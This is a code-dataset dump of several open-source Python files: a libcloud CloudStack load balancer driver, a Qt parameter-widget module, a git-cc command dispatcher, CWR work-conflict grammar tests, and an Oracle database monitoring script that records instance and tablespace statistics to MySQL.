repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
Keisuke69/libcloud | libcloud/loadbalancer/drivers/cloudstack.py | 1 | 4800 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.common.cloudstack import CloudStackConnection, \
CloudStackDriverMixIn
from libcloud.loadbalancer.base import LoadBalancer, Member, Driver, Algorithm
from libcloud.loadbalancer.base import DEFAULT_ALGORITHM
from libcloud.loadbalancer.types import State, LibcloudLBImmutableError
from libcloud.utils import reverse_dict
class CloudStackLBDriver(CloudStackDriverMixIn, Driver):
"""Driver for CloudStack load balancers."""
api_name = 'cloudstack_lb'
_VALUE_TO_ALGORITHM_MAP = {
'roundrobin': Algorithm.ROUND_ROBIN,
'leastconn': Algorithm.LEAST_CONNECTIONS
}
_ALGORITHM_TO_VALUE_MAP = reverse_dict(_VALUE_TO_ALGORITHM_MAP)
LB_STATE_MAP = {
'Active': State.RUNNING,
}
def list_protocols(self):
"""We don't actually have any protocol awareness beyond TCP."""
return [ 'tcp' ]
def list_balancers(self):
balancers = self._sync_request('listLoadBalancerRules')
balancers = balancers.get('loadbalancerrule', [])
return [self._to_balancer(balancer) for balancer in balancers]
def get_balancer(self, balancer_id):
balancer = self._sync_request('listLoadBalancerRules', id=balancer_id)
balancer = balancer.get('loadbalancerrule', [])
if not balancer:
raise Exception("no such load balancer: " + str(balancer_id))
return self._to_balancer(balancer[0])
def create_balancer(self, name, members, protocol='http', port=80,
algorithm=DEFAULT_ALGORITHM, location=None,
private_port=None):
if location is None:
locations = self._sync_request('listZones')
location = locations['zone'][0]['id']
else:
location = location.id
if private_port is None:
private_port = port
result = self._async_request('associateIpAddress', zoneid=location)
public_ip = result['ipaddress']
result = self._sync_request('createLoadBalancerRule',
algorithm=self._ALGORITHM_TO_VALUE_MAP[algorithm],
name=name,
privateport=private_port,
publicport=port,
publicipid=public_ip['id'],
)
balancer = self._to_balancer(result['loadbalancer'])
for member in members:
balancer.attach_member(member)
return balancer
def destroy_balancer(self, balancer):
self._async_request('deleteLoadBalancerRule', id=balancer.id)
self._async_request('disassociateIpAddress',
id=balancer.ex_public_ip_id)
def balancer_attach_member(self, balancer, member):
member.port = balancer.ex_private_port
self._async_request('assignToLoadBalancerRule', id=balancer.id,
virtualmachineids=member.id)
return True
def balancer_detach_member(self, balancer, member):
self._async_request('removeFromLoadBalancerRule', id=balancer.id,
virtualmachineids=member.id)
return True
def balancer_list_members(self, balancer):
members = self._sync_request('listLoadBalancerRuleInstances',
id=balancer.id)
members = members['loadbalancerruleinstance']
return [self._to_member(m, balancer.ex_private_port) for m in members]
def _to_balancer(self, obj):
balancer = LoadBalancer(
id=obj['id'],
name=obj['name'],
state=self.LB_STATE_MAP.get(obj['state'], State.UNKNOWN),
ip=obj['publicip'],
port=obj['publicport'],
driver=self.connection.driver
)
balancer.ex_private_port = obj['privateport']
balancer.ex_public_ip_id = obj['publicipid']
return balancer
def _to_member(self, obj, port):
return Member(
id=obj['id'],
ip=obj['nic'][0]['ipaddress'],
port=port
)
| apache-2.0 | 400,207,334,912,929,400 | 38.02439 | 78 | 0.63875 | false |
BBN-Q/Quince | quince/param.py | 1 | 16560 | # coding: utf-8
# Raytheon BBN Technologies 2016
# Contributiors: Graham Rowlands
#
# This file contains the parameter descriptions
from qtpy.QtGui import *
from qtpy.QtCore import *
from qtpy.QtWidgets import *
import os
class Parameter(QGraphicsEllipseItem):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
self.name = name
self.parent = parent
rad = 5
super(Parameter, self).__init__(-rad, -rad, 2*rad, 2*rad, parent=parent)
self.has_input = True # Do we draw the connector?
self.interactive = True # Can we modify the value?
self.setBrush(QBrush(QColor(200,200,240)))
self.setPen(Qt.black)
self.setZValue(1)
self.height = 36
self.height_collapsed = 15
self.temp_wire = None
self.wires_in = []
self.wires_out = []
# Text label and area
self.label = QGraphicsTextItem(self.name, parent=self)
self.label.setDefaultTextColor(Qt.black)
self.label.setPos(5,-10)
# Value Box
self.value_box = None
def set_changed_flag(self):
# Would prefer to use signals/slots, but that's apparently too heavy for QGraphics
# Instead we add the name of the changed parameter to the list
if self.parent is not None and not self.parent.changing:
self.parent.changing = True
self.parent.value_changed( self.name )
def set_interactive(self, value):
self.interactive = value
self.value_box.interactive = value
def set_collapsed(self, collapsed):
self.collapsed = collapsed
self.value_box.setVisible(not self.collapsed)
def width(self):
return self.label.boundingRect().topRight().x()
def set_box_width(self, width):
self.value_box.set_box_width(width)
def value(self):
return self.value_box.value()
def set_value(self, value):
self.value_box.set_value(value)
self.set_changed_flag()
def paint(self, painter, options, widget):
if self.has_input:
super(Parameter, self).paint(painter, options, widget)
class NumericalParameter(Parameter):
"""docstring for Parameter"""
def __init__(self, name, datatype, min_value, max_value,
increment, snap, parent=None):
super(NumericalParameter, self).__init__(name, parent=parent)
self.datatype = datatype
self.value_box = SliderBox(
datatype, min_value, max_value, increment, snap,
parent=self)
def set_value(self, value):
self.value_box.set_value(self.datatype(value))
self.set_changed_flag()
class StringParameter(Parameter):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
super(StringParameter, self).__init__(name, parent=parent)
self.value_box = StringBox(parent=self)
self.parent = parent
def set_value(self, value):
self.value_box.set_value(value)
class ComboParameter(StringParameter):
"""docstring for Parameter"""
def __init__(self, name, values, parent=None):
super(ComboParameter, self).__init__(name, parent=parent)
self.value_box.setParentItem(None)
self.value_box = ComboBox(values, parent=self)
def set_collapsed(self, collapsed):
self.collapsed = collapsed
self.value_box.setVisible(not self.collapsed)
class BooleanParameter(Parameter):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
super(BooleanParameter, self).__init__(name, parent=parent)
self.value_box = CheckBox(parent=self)
self.height = 15
self.height_collapsed = 15
def width(self):
return self.label.boundingRect().topRight().x() + 18
class FilenameParameter(StringParameter):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
super(FilenameParameter, self).__init__(name, parent=parent)
self.value_box.setParentItem(None)
self.value_box = FilenameBox(parent=self)
def width(self):
return self.label.boundingRect().topRight().x() + 20
class SliderBox(QGraphicsRectItem):
"""docstring for SliderBox"""
def __init__(self, datatype, min_value, max_value, increment, snap, parent=None):
super(SliderBox, self).__init__(parent=parent)
self.parent = parent
self.dragging = False
self.value_changed = False
self.interactive = True
self.datatype = datatype
self.min_value = min_value
self.max_value = max_value
self.increment = increment
self.snap = snap
self._value = min_value
self.height = 14
self.rect_radius = 7.0
self.control_distance = 0.55228*self.rect_radius
self.setRect(3,15,94,self.height)
self.label = ValueBoxText(self.textFromValue(self._value), parent=self)
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
def paint(self, painter, options, widget):
# Background object is a rounded rectangle
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().bottomLeft())
linear_gradient.setColorAt(0, QColor(150,150,150))
linear_gradient.setColorAt(1, QColor(200,200,200))
painter.RenderHint(QPainter.Antialiasing)
painter.setBrush(QBrush(linear_gradient))
painter.setPen(QPen(QColor(200,200,200), 0.75))
painter.drawRoundedRect(self.rect(), self.rect_radius, self.rect_radius)
# Draw the bar using a round capped line
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().topRight())
linear_gradient.setColorAt(0, QColor(180,180,220))
linear_gradient.setColorAt(1, QColor(80,80,100))
painter.setPen(QPen(QBrush(linear_gradient), 0.9*self.height, Qt.SolidLine, Qt.RoundCap))
path = QPainterPath()
path.moveTo(3+self.rect_radius, 15 + 0.5*self.height)
fill_size = (self.rect().width()-2*self.rect_radius)*(self._value-self.min_value)/(self.max_value-self.min_value)
path.lineTo(3+self.rect_radius+fill_size, 7.5 + 0.5+self.height)
painter.drawPath(path)
# Draw the highlight line similarly
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().bottomLeft())
linear_gradient.setColorAt(0, QColor(240,240,240,150))
linear_gradient.setColorAt(0.3, QColor(240,240,240,00))
painter.setPen(QPen(QBrush(linear_gradient), 0.9*self.height, Qt.SolidLine, Qt.RoundCap))
path = QPainterPath()
path.moveTo(3+self.rect_radius, 15.0 + 0.5*self.height)
path.lineTo(3+self.rect_radius+fill_size, 15.0 + 0.5*self.height)
painter.drawPath(path)
def valueFromText(self, text):
try:
if self.datatype is int:
val = int(str(text))
else:
val = float(str(text))
return val
except:
self.scene().window.set_status("Got unreasonable input...")
return self._value
def textFromValue(self, value):
if self.datatype is int:
return ("{:d}".format(value))
else:
return ("{:.4g}".format(value))
def set_value(self, val):
changed = False
val = self.valueFromText(val)
if val >= self.min_value and val <= self.max_value:
if self.snap:
val = (val/self.snap)*self.snap
self._value = self.datatype(val)
changed = True
elif val < self.min_value:
self._value = self.datatype(self.min_value)
changed = True
else:
self._value = self.datatype(self.max_value)
changed = True
self.label.full_text = self.textFromValue(self._value)
self.label.setPlainText(self.textFromValue(self._value))
self.refresh_label()
self.update()
if changed:
self.parent.set_changed_flag()
def refresh_label(self):
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
self.update()
def value(self):
return self._value
def set_box_width(self, width):
self.setRect(3,15, width-6, self.height)
label_width = self.label.boundingRect().topRight().x()
self.label.clip_text()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
def mousePressEvent(self, event):
if self.interactive:
self.dragging = True
self.original_value = self._value
self.drag_start = event.scenePos()
else:
super(SliderBox, self).mouseMoveEvent(event)
def mouseMoveEvent(self, event):
if self.interactive:
if self.dragging:
delta = event.scenePos() - self.drag_start
value_change = self.increment*int(delta.x()/10.0)
if value_change != 0.0:
self.value_changed = True
self.set_value(self.original_value + value_change)
else:
super(SliderBox, self).mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
if self.interactive:
self.dragging = False
if not self.value_changed:
self.label.setPos(3+5,15-5)
self.label.set_text_interaction(True)
self.value_changed = False
else:
super(SliderBox, self).mouseMoveEvent(event)
class StringBox(QGraphicsRectItem):
"""docstring for SliderBox"""
def __init__(self, parent=None):
super(StringBox, self).__init__(parent=parent)
self.clicked = False
self._value = ""
self.height = 14
self.rect_radius = 7.0
self.control_distance = 0.55228*self.rect_radius
self.setRect(3,15,94,self.height)
self.label = ValueBoxText(self._value, parent=self)
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
def paint(self, painter, options, widget):
# Background object is a rounded rectangle
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().bottomLeft())
linear_gradient.setColorAt(0, QColor(150,150,150))
linear_gradient.setColorAt(1, QColor(200,200,200))
painter.RenderHint(QPainter.Antialiasing)
painter.setBrush(QBrush(linear_gradient))
painter.setPen(QPen(QColor(200,200,200), 0.75))
painter.drawRoundedRect(self.rect(), self.rect_radius, self.rect_radius)
def set_value(self, value):
self._value = value
self.label.full_text = value
self.label.setPlainText(value)
self.label.clip_text()
self.refresh_label()
self.update()
if hasattr(self, 'parent'):
self.parent.set_changed_flag()
def refresh_label(self):
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
self.update()
def value(self):
return self._value
def set_box_width(self, width):
self.setRect(3,15, width-6, self.height)
self.label.clip_text()
self.refresh_label()
def mousePressEvent(self, event):
self.clicked = True
def mouseReleaseEvent(self, event):
if self.clicked:
self.label.setPos(3+5,15-5)
self.label.set_text_interaction(True)
self.clicked = False
class FilenameBox(StringBox):
"""docstring for FilenameBox"""
def __init__(self, parent=None):
super(FilenameBox, self).__init__(parent=parent)
self.browse_button = QGraphicsRectItem(self.rect().width()-16, -3, 15, 12, parent=self)
self.browse_button.setBrush(QBrush(QColor(220,220,220)))
self.browse_button.mousePressEvent = lambda e: self.save_file()
# self.browse_button.mouseReleaseEvent = lambda e: self.save_file()
def save_file(self):
path = os.path.dirname(os.path.realpath(__file__))
fn = QFileDialog.getSaveFileName(None, 'Save Results As', path)
self.set_value(fn[0])
self.label.clip_text()
self.refresh_label()
def refresh_label(self):
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
self.browse_button.setRect(self.rect().width()-16, -3, 15, 12)
self.update()
class ComboBox(StringBox):
"""docstring for ComboBox"""
def __init__(self, values, parent=None):
super(ComboBox, self).__init__(parent=parent)
self.values = values
def menu_changed(self, action):
self.set_value(action.data())
def mousePressEvent(self, event):
self.clicked = True
def mouseReleaseEvent(self, event):
if self.clicked:
menu = QMenu()
for v in self.values:
act = QAction(v, self.scene())
act.setData(v)
menu.addAction(act)
menu.triggered.connect(self.menu_changed)
menu.exec_(event.screenPos())
self.clicked = False
class CheckBox(QGraphicsRectItem):
"""docstring for CheckBox"""
def __init__(self, parent=None):
super(CheckBox, self).__init__(parent=parent)
self.parent = parent
self.setRect(self.rect().width()-17, -3, 13, 13)
self.unchecked_brush = QBrush(QColor(220,220,220))
self.checked_brush = QBrush(QColor(40,40,40))
self.setBrush(self.unchecked_brush)
self._value = False
self.clicked = False
def set_box_width(self, width):
self.setRect(width-17, -3, 13, 13)
def value(self):
return self._value
def set_value(self, value):
self._value = value
if self._value:
self.setBrush(self.checked_brush)
else:
self.setBrush(self.unchecked_brush)
def mousePressEvent(self, event):
self.clicked = True
def mouseReleaseEvent(self, event):
if self.clicked:
self.set_value(not self._value)
self.clicked = False
class ValueBoxText(QGraphicsTextItem):
"""docstring for ValueBoxText"""
def __init__(self, string, parent=None):
super(ValueBoxText, self).__init__(string, parent=parent)
self.setTextInteractionFlags(Qt.NoTextInteraction)
self.ItemIsFocusable = True
self.parent = parent
self.full_text = string
self.clip_text()
def set_text_interaction(self, value):
if value and (self.textInteractionFlags() == Qt.NoTextInteraction):
self.setTextInteractionFlags(Qt.TextEditorInteraction)
self.setPlainText(self.full_text)
self.setFocus(Qt.MouseFocusReason)
self.setSelected(True)
c = self.textCursor()
c.select(QTextCursor.Document)
self.setTextCursor(c)
elif not value and (self.textInteractionFlags() == Qt.TextEditorInteraction):
self.setTextInteractionFlags(Qt.NoTextInteraction)
c = self.textCursor()
c.clearSelection()
self.setTextCursor(c)
self.clearFocus()
def clip_text(self):
if self.parent.rect().width() < self.boundingRect().topRight().x():
clipped = self.full_text[:int(self.parent.rect().width()/7)-3]
if int(self.parent.rect().width()/6)-3 == len(self.full_text)-1:
self.setPlainText(clipped)
else:
self.setPlainText(clipped+"...")
def focusOutEvent(self, event):
self.full_text = self.toPlainText()
self.set_text_interaction(False)
self.parent.set_value(self.full_text)
self.clip_text()
self.parent.refresh_label()
return super(ValueBoxText, self).focusOutEvent(event)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:
self.full_text = self.toPlainText()
self.set_text_interaction(False)
self.parent.set_value(self.full_text)
self.clip_text()
self.parent.refresh_label()
else:
return super(ValueBoxText, self).keyPressEvent(event)
| apache-2.0 | 6,470,298,466,741,095,000 | 35.315789 | 121 | 0.61087 | false |
charleso/git-cc | git_cc/gitcc.py | 1 | 2009 | #!/usr/bin/env python
import inspect
import sys
from optparse import OptionParser
from . import checkin
from . import init
from . import rebase
from . import reset
from . import sync
from . import tag
from . import update
from . import version
commands = [
init, rebase, checkin, sync, reset, tag, update, version
]
def main():
args = sys.argv[1:]
for cmd in commands:
if args and get_module_name(cmd) == args[0]:
return invoke(cmd, args)
usage()
def invoke(cmd, args):
_args, _, _, defaults = inspect.getargspec(cmd.main)
defaults = defaults if defaults else []
diff = len(_args) - len(defaults)
_args = _args[diff:]
parser = OptionParser(description=cmd.__doc__)
for (name, default) in zip(_args, defaults):
option = {
'default': default,
'help': cmd.ARGS[name],
'dest': name,
}
if default is False:
option['action'] = "store_true"
elif default is None:
option['action'] = "store"
name = name.replace('_', '-')
parser.add_option('--' + name, **option)
(options, args) = parser.parse_args(args[1:])
if len(args) < diff:
parser.error("incorrect number of arguments")
for name in _args:
args.append(getattr(options, name))
cmd.main(*args)
def usage():
print('usage: gitcc COMMAND [ARGS]\n')
width = 11
for cmd in commands:
print(' %s %s' % (get_module_name(cmd).ljust(width),
cmd.__doc__.split('\n')[0]))
sys.exit(2)
def get_module_name(module):
"""Return the name of the given module, without the package name.
For example, if the given module is checkin, the module name is
"git_cc.checkin" and without the package name is "checkin".
Note that the given module should already have been imported.
"""
_, _, module_name = module.__name__.rpartition('.')
return module_name
if __name__ == '__main__':
main()
| gpl-2.0 | 6,877,740,957,302,435,000 | 25.090909 | 69 | 0.590841 | false |
weso/CWR-DataApi | tests/grammar/factory/record/test_work_conflict.py | 1 | 6028 | # -*- coding: utf-8 -*-
import unittest
from pyparsing import ParseException
from tests.utils.grammar import get_record_grammar
"""
CWR Work conflict grammar tests.
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestWorkValid(unittest.TestCase):
"""
Tests that the Work grammar decodes correctly formatted strings
"""
def setUp(self):
self.grammar = get_record_grammar('work_conflict')
def test_valid_full(self):
"""
Tests that the Work grammar decodes correctly formatted Work record.
This test contains all the optional fields.
"""
record = 'EXC0000123400000023TITLE OF THE WORK ENABCD0123456789T012345678920130102AB0123456789POP030201YMUSPOTMODMOVORIORITHE CONTACT A123456789ARY01220140302Y28#3 KV 297#1 Y'
result = self.grammar.parseString(record)[0]
self.assertEqual('EXC', result.record_type)
self.assertEqual(1234, result.transaction_sequence_n)
self.assertEqual(23, result.record_sequence_n)
self.assertEqual('TITLE OF THE WORK', result.title)
self.assertEqual('EN', result.language_code)
self.assertEqual('ABCD0123456789', result.submitter_work_n)
self.assertEqual('T0123456789', result.iswc)
self.assertEqual(1, result.copyright_date.month)
self.assertEqual(2, result.copyright_date.day)
self.assertEqual(2013, result.copyright_date.year)
self.assertEqual('AB0123456789', result.copyright_number)
self.assertEqual('POP', result.musical_work_distribution_category)
self.assertEqual(3, result.duration.hour)
self.assertEqual(2, result.duration.minute)
self.assertEqual(1, result.duration.second)
self.assertEqual('Y', result.recorded_indicator)
self.assertEqual('MUS', result.text_music_relationship)
self.assertEqual('POT', result.composite_type)
self.assertEqual('MOD', result.version_type)
self.assertEqual('MOV', result.excerpt_type)
self.assertEqual('ORI', result.music_arrangement)
self.assertEqual('ORI', result.lyric_adaptation)
self.assertEqual('THE CONTACT', result.contact_name)
self.assertEqual('A123456789', result.contact_id)
self.assertEqual('AR', result.work_type)
self.assertEqual(True, result.grand_rights_indicator)
self.assertEqual(12, result.composite_component_count)
self.assertEqual(2, result.date_publication_printed_edition.day)
self.assertEqual(3, result.date_publication_printed_edition.month)
self.assertEqual(2014, result.date_publication_printed_edition.year)
self.assertEqual('Y', result.exceptional_clause)
self.assertEqual('28#3', result.opus_number)
self.assertEqual('KV 297#1', result.catalogue_number)
self.assertEqual('Y', result.priority_flag)
def test_valid_minimum(self):
"""
Tests that the Work grammar decodes correctly formatted Work record.
This test contains no optional fields.
"""
record = 'EXC0000123400000023TITLE OF THE WORK ENABCD0123456789T012345678920130102AB0123456789POP030201YMUS ORIMOV THE CONTACT A123456789 00020140302Y28#3 KV 297#1 Y'
result = self.grammar.parseString(record)[0]
self.assertEqual('EXC', result.record_type)
self.assertEqual(1234, result.transaction_sequence_n)
self.assertEqual(23, result.record_sequence_n)
self.assertEqual('TITLE OF THE WORK', result.title)
self.assertEqual('EN', result.language_code)
self.assertEqual('ABCD0123456789', result.submitter_work_n)
self.assertEqual('T0123456789', result.iswc)
self.assertEqual(1, result.copyright_date.month)
self.assertEqual(2, result.copyright_date.day)
self.assertEqual(2013, result.copyright_date.year)
self.assertEqual('AB0123456789', result.copyright_number)
self.assertEqual('POP', result.musical_work_distribution_category)
self.assertEqual(3, result.duration.hour)
self.assertEqual(2, result.duration.minute)
self.assertEqual(1, result.duration.second)
self.assertEqual('Y', result.recorded_indicator)
self.assertEqual('MUS', result.text_music_relationship)
self.assertEqual(None, result.composite_type)
self.assertEqual('ORI', result.version_type)
self.assertEqual('MOV', result.excerpt_type)
self.assertEqual(None, result.music_arrangement)
self.assertEqual(None, result.lyric_adaptation)
self.assertEqual('THE CONTACT', result.contact_name)
self.assertEqual('A123456789', result.contact_id)
self.assertEqual(None, result.work_type)
self.assertEqual(None, result.grand_rights_indicator)
self.assertEqual(0, result.composite_component_count)
self.assertEqual(2, result.date_publication_printed_edition.day)
self.assertEqual(3, result.date_publication_printed_edition.month)
self.assertEqual(2014, result.date_publication_printed_edition.year)
self.assertEqual('Y', result.exceptional_clause)
self.assertEqual('28#3', result.opus_number)
self.assertEqual('KV 297#1', result.catalogue_number)
self.assertEqual('Y', result.priority_flag)
class TestIPAGrammarException(unittest.TestCase):
def setUp(self):
self.grammar = get_record_grammar('work_conflict')
def test_empty(self):
"""
Tests that a exception is thrown when the the works number is zero.
"""
record = ''
self.assertRaises(ParseException, self.grammar.parseString, record)
def test_invalid(self):
record = 'This is an invalid string'
self.assertRaises(ParseException, self.grammar.parseString, record)
| mit | 8,374,611,062,530,791,000 | 45.007634 | 279 | 0.672972 | false |
G8bao7/camelbell-server | check_oracle.py | 1 | 10171 | #!//bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
import cx_Oracle
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("oracle")
path='./include'
sys.path.insert(0,path)
import functions as func
import camelbell_oracle as oracle
from multiprocessing import Process;
def check_oracle(host,port,dsn,username,password,server_id,tags):
url = "%s:%s/%s" % (host, port, dsn)
logger_msg = "[BBQ]begin check oracle %s " %(url)
logger.info(logger_msg)
retry = 4
conn = None
for i in range(1,retry):
try:
logger_msg="[BBQ] oracle connect %s retry [%s]" %(url, i)
logger.info(logger_msg)
conn=cx_Oracle.connect(username,password,url) #获取connection对象
break
except Exception, e:
logger_msg="[BBQ] oracle connect %s, %s" %(url,str(e).strip('\n'))
logger.warning(logger_msg)
conn = None
continue
func.check_db_status(server_id,host,port,tags,'oracle')
if conn == None:
try:
connect=0
sql="replace into oracle_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
except Exception, e:
logger.error(str(e).strip('\n'))
sys.exit(1)
finally:
sys.exit(1)
try:
#get info by v$instance
connect = 1
instance_name = oracle.get_instance(conn,'instance_name')
instance_role = oracle.get_instance(conn,'instance_role')
database_role = oracle.get_database(conn,'database_role')
open_mode = oracle.get_database(conn,'open_mode')
protection_mode = oracle.get_database(conn,'protection_mode')
if database_role == 'PRIMARY':
database_role_new = 'm'
dg_stats = '-1'
dg_delay = '-1'
else:
database_role_new = 's'
dg_stats = oracle.get_dg_stats(conn)
dg_delay = oracle.get_dg_delay(conn)
instance_status = oracle.get_instance(conn,'status')
startup_time = oracle.get_instance(conn,'startup_time')
#print startup_time
#startup_time = time.strftime('%Y-%m-%d %H:%M:%S',startup_time)
#localtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
#uptime = (localtime - startup_time).seconds
#print uptime
uptime = oracle.get_instance(conn,'startup_time')
version = oracle.get_instance(conn,'version')
instance_status = oracle.get_instance(conn,'status')
database_status = oracle.get_instance(conn,'database_status')
host_name = oracle.get_instance(conn,'host_name')
archiver = oracle.get_instance(conn,'archiver')
#get info by sql count
session_total = oracle.get_sessions(conn)
session_actives = oracle.get_actives(conn)
session_waits = oracle.get_waits(conn)
#get info by v$parameters
parameters = oracle.get_parameters(conn)
processes = parameters['processes']
##get info by v$parameters
sysstat_0 = oracle.get_sysstat(conn)
time.sleep(1)
sysstat_1 = oracle.get_sysstat(conn)
session_logical_reads_persecond = sysstat_1['session logical reads']-sysstat_0['session logical reads']
physical_reads_persecond = sysstat_1['physical reads']-sysstat_0['physical reads']
physical_writes_persecond = sysstat_1['physical writes']-sysstat_0['physical writes']
physical_read_io_requests_persecond = sysstat_1['physical write total IO requests']-sysstat_0['physical write total IO requests']
physical_write_io_requests_persecond = sysstat_1['physical read IO requests']-sysstat_0['physical read IO requests']
db_block_changes_persecond = sysstat_1['db block changes']-sysstat_0['db block changes']
os_cpu_wait_time = sysstat_0['OS CPU Qt wait time']
logons_persecond = sysstat_1['logons cumulative']-sysstat_0['logons cumulative']
logons_current = sysstat_0['logons current']
opened_cursors_persecond = sysstat_1['opened cursors cumulative']-sysstat_0['opened cursors cumulative']
opened_cursors_current = sysstat_0['opened cursors current']
user_commits_persecond = sysstat_1['user commits']-sysstat_0['user commits']
user_rollbacks_persecond = sysstat_1['user rollbacks']-sysstat_0['user rollbacks']
user_calls_persecond = sysstat_1['user calls']-sysstat_0['user calls']
db_block_gets_persecond = sysstat_1['db block gets']-sysstat_0['db block gets']
#print session_logical_reads_persecond
##################### insert data to mysql server#############################
func.mysql_exec("replace into oracle_status_history SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from oracle_status where host='%s' and port=%s;" % (host, port),'')
func.mysql_exec("delete from oracle_status where host='%s' and port=%s;" % (host, port),'')
sql = "insert into oracle_status(server_id,host,port,tags,connect,instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond)
func.mysql_exec(sql,param)
logger.info("Finish INSERT DATA ")
func.update_db_status_init(server_id,database_role_new,version,host,port,tags)
logger.info("Finish update_db_status_init")
#check tablespace
qSql = "select 1 from oracle_tablespace where host='%s' and port=%s and create_time>=curdate() limit 1" % (host,port)
a = func.mysql_query(qSql)
if func.mysql_query(qSql) == 0:
func.mysql_exec("insert ignore into oracle_tablespace_history SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from oracle_tablespace where host='%s' and port=%s;" % (host, port),'')
func.mysql_exec("delete from oracle_tablespace where host='%s' and port=%s;" % (host, port),'')
tablespace = oracle.get_tablespace(conn)
if tablespace:
for line in tablespace:
ts_name=line[0]
if igTsNames.count(ts_name) > 0:
continue
sql="insert into oracle_tablespace(server_id,host,port,tags,tablespace_name,total_size,used_size,avail_size,used_rate) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,line[0],line[1],line[2],line[3],int(line[4].rstrip("%")))
logger.info(param)
func.mysql_exec(sql,param)
else:
logger.info("%s:%s today has stat oracle_tablespace. will not do" % (host,port))
logger.info("Finish oracle_tablespace")
except Exception, e:
logger.error(e)
sys.exit(1)
finally:
conn.close()
def main():
#get oracle servers list
#servers=func.mysql_query("select id,host,port,dsn,username,password,tags from db_servers_oracle where is_delete=0 and monitor=1;")
servers=func.mysql_query("select id,host,port,dsn,tags from db_servers_oracle where is_delete=0 and monitor=1;")
#++ guoqi
cnfKey = "monitor_oracle"
username = func.get_config(cnfKey,'user')
password = func.get_config(cnfKey,'passwd')
min_interval = func.get_option('min_interval')
logger.info("check oracle controller start.")
if servers:
plist = []
for row in servers:
(server_id, host, port, dsn, tags) = row
p = Process(target = check_oracle, args = (host,port,dsn,username,password,server_id,tags))
plist.append(p)
p.start()
#time.sleep(10)
#for p in plist:
# p.terminate()
for p in plist:
p.join()
else:
logger.warning("check oracle: not found any servers")
func.mysql_exec('update oracle_status set connect=0,create_time=now() where create_time<date_sub(now(), interval %s second)' % (min_interval))
func.mysql_exec('DELETE ot FROM oracle_tablespace AS ot, db_servers_oracle AS d where (d.is_delete=1 or d.monitor=0) AND ot.host=d.host AND ot.port=d.port')
func.mysql_exec('DELETE ot FROM oracle_status AS ot, db_servers_oracle AS d where (d.is_delete=1 or d.monitor=0) AND ot.host=d.host AND ot.port=d.port')
#func.mysql_exec('DELETE ds FROM oracle_status AS ds, (SELECT s.id,d.host FROM oracle_status AS s LEFT JOIN db_servers_oracle AS d ON d.is_delete=0 AND d.monitor=1 AND s.host=d.host AND s.port=d.port HAVING d.`host` IS NULL) AS t WHERE ds.id=t.id')
